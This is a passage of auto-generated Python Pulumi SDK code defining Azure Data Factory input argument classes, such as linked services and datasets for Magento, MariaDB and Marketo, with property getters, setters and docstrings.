pulumi.set(self, "deserializer", value)
@property
@pulumi.getter(name="encodingName")
def encoding_name(self) -> Optional[Any]:
"""
The code page name of the preferred encoding. If not provided, the default value is 'utf-8', unless the byte order mark (BOM) denotes another Unicode encoding. The full list of supported values can be found in the 'Name' column of the table of encodings in the following reference: https://go.microsoft.com/fwlink/?linkid=861078. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encoding_name")
@encoding_name.setter
def encoding_name(self, value: Optional[Any]):
pulumi.set(self, "encoding_name", value)
@property
@pulumi.getter(name="filePattern")
def file_pattern(self) -> Optional[pulumi.Input[str]]:
"""
File pattern of JSON, i.e. the way a collection of JSON objects is separated. The default value is 'setOfObjects'. It is case-sensitive.
"""
return pulumi.get(self, "file_pattern")
@file_pattern.setter
def file_pattern(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "file_pattern", value)
@property
@pulumi.getter(name="jsonNodeReference")
def json_node_reference(self) -> Optional[Any]:
"""
The JSONPath of the JSON array element to be flattened. Example: "$.ArrayPath". Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "json_node_reference")
@json_node_reference.setter
def json_node_reference(self, value: Optional[Any]):
pulumi.set(self, "json_node_reference", value)
@property
@pulumi.getter(name="jsonPathDefinition")
def json_path_definition(self) -> Optional[Any]:
"""
The JSONPath definition for each column mapping with a customized column name to extract data from JSON file. For fields under root object, start with "$"; for fields inside the array chosen by jsonNodeReference property, start from the array element. Example: {"Column1": "$.Column1Path", "Column2": "Column2PathInArray"}. Type: object (or Expression with resultType object).
"""
return pulumi.get(self, "json_path_definition")
@json_path_definition.setter
def json_path_definition(self, value: Optional[Any]):
pulumi.set(self, "json_path_definition", value)
@property
@pulumi.getter(name="nestingSeparator")
def nesting_separator(self) -> Optional[Any]:
"""
The character used to separate nesting levels. Default value is '.' (dot). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "nesting_separator")
@nesting_separator.setter
def nesting_separator(self, value: Optional[Any]):
pulumi.set(self, "nesting_separator", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@pulumi.input_type
class LinkedIntegrationRuntimeKeyArgs:
def __init__(__self__, *,
authorization_type: pulumi.Input[str],
key: pulumi.Input['SecureStringArgs']):
"""
Key-based authorization for a linked integration runtime.
:param pulumi.Input[str] authorization_type: The authorization type (set to 'Key' by the constructor).
:param pulumi.Input['SecureStringArgs'] key: The key used for authorization.
"""
pulumi.set(__self__, "authorization_type", 'Key')
pulumi.set(__self__, "key", key)
@property
@pulumi.getter(name="authorizationType")
def authorization_type(self) -> pulumi.Input[str]:
"""
The authorization type (always 'Key' for this class).
"""
return pulumi.get(self, "authorization_type")
@authorization_type.setter
def authorization_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authorization_type", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input['SecureStringArgs']:
"""
The key used for authorization.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input['SecureStringArgs']):
pulumi.set(self, "key", value)
@pulumi.input_type
class LinkedIntegrationRuntimeRbacArgs:
def __init__(__self__, *,
authorization_type: pulumi.Input[str],
resource_id: pulumi.Input[str]):
"""
RBAC authorization for a linked integration runtime.
:param pulumi.Input[str] authorization_type: The authorization type (set to 'RBAC' by the constructor).
:param pulumi.Input[str] resource_id: The resource ID of the integration runtime to be shared.
"""
pulumi.set(__self__, "authorization_type", 'RBAC')
pulumi.set(__self__, "resource_id", resource_id)
@property
@pulumi.getter(name="authorizationType")
def authorization_type(self) -> pulumi.Input[str]:
"""
The authorization type (always 'RBAC' for this class).
"""
return pulumi.get(self, "authorization_type")
@authorization_type.setter
def authorization_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authorization_type", value)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Input[str]:
"""
The resource ID of the integration runtime to be shared.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_id", value)
@pulumi.input_type
class LinkedServiceReferenceArgs:
def __init__(__self__, *,
reference_name: pulumi.Input[str],
type: pulumi.Input[str],
parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None):
"""
Linked service reference type.
:param pulumi.Input[str] reference_name: Reference LinkedService name.
:param pulumi.Input[str] type: Linked service reference type.
:param pulumi.Input[Mapping[str, Any]] parameters: Arguments for LinkedService.
"""
pulumi.set(__self__, "reference_name", reference_name)
pulumi.set(__self__, "type", type)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="referenceName")
def reference_name(self) -> pulumi.Input[str]:
"""
Reference LinkedService name.
"""
return pulumi.get(self, "reference_name")
@reference_name.setter
def reference_name(self, value: pulumi.Input[str]):
pulumi.set(self, "reference_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Linked service reference type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Arguments for LinkedService.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class MagentoLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
access_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Magento server linked service.
:param Any host: The URL of the Magento instance. (e.g. 192.168.222.110/magento3)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The access token from Magento.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Magento')
if access_token is not None:
pulumi.set(__self__, "access_token", access_token)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def host(self) -> Any:
"""
The URL of the Magento instance. (e.g. 192.168.222.110/magento3)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The access token from Magento.
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class MagentoObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Magento server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'MagentoObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ManagedIntegrationRuntimeArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
compute_properties: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
ssis_properties: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']] = None):
"""
Managed integration runtime, including managed elastic and managed dedicated integration runtimes.
:param pulumi.Input[str] type: Type of integration runtime.
:param pulumi.Input['IntegrationRuntimeComputePropertiesArgs'] compute_properties: The compute resource for managed integration runtime.
:param pulumi.Input[str] description: Integration runtime description.
:param pulumi.Input['IntegrationRuntimeSsisPropertiesArgs'] ssis_properties: SSIS properties for managed integration runtime.
"""
pulumi.set(__self__, "type", 'Managed')
if compute_properties is not None:
pulumi.set(__self__, "compute_properties", compute_properties)
if description is not None:
pulumi.set(__self__, "description", description)
if ssis_properties is not None:
pulumi.set(__self__, "ssis_properties", ssis_properties)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of integration runtime.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="computeProperties")
def compute_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]:
"""
The compute resource for managed integration runtime.
"""
return pulumi.get(self, "compute_properties")
@compute_properties.setter
def compute_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeComputePropertiesArgs']]):
pulumi.set(self, "compute_properties", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Integration runtime description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ssisProperties")
def ssis_properties(self) -> Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]:
"""
SSIS properties for managed integration runtime.
"""
return pulumi.get(self, "ssis_properties")
@ssis_properties.setter
def ssis_properties(self, value: Optional[pulumi.Input['IntegrationRuntimeSsisPropertiesArgs']]):
pulumi.set(self, "ssis_properties", value)
@pulumi.input_type
class MariaDBLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
MariaDB server linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'MariaDB')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class MariaDBTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
MariaDB server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'MariaDBTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class MarketoLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Marketo server linked service.
:param Any client_id: The client ID of your Marketo service.
:param Any endpoint: The endpoint of the Marketo server (e.g. 123-ABC-321.mktorest.com).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret of your Marketo service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'Marketo')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID of your Marketo service.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Marketo server (e.g. 123-ABC-321.mktorest.com).
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret of your Marketo service.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class MarketoObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Marketo server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'MarketoObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
